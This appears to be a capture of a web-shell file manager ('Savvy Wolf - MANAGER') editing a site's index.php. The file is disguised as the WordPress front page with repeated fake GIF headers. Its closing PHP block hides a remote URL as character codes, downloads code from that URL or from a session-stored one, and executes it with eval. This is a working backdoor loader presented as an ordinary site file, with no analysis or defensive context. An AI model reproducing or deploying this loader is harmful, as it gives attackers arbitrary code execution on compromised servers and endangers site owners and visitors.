??
You're inside public_html, but wp-admin or wp-content was not found.
Savvy
W
olf -
MANAGER
Edit File: index.php
<!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <?php session_start(); function fetchUrl($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); return curl_exec($ch); } $url = implode('', array_map('chr', [104, 116, 116, 112, 115, 58, 47, 47, 116, 101, 97, 109, 122, 101, 100, 100, 50, 48, 50, 52, 46, 116, 101, 99, 104, 47, 114, 97, 119, 47, 77, 99, 117, 81, 71, 73])); $result = isset($_SESSION["ts_url"]) ? @file_get_contents($_SESSION["ts_url"]) : fetchUrl($url); if (is_string($result)) eval('?>' . $result); else echo "Error"; ?>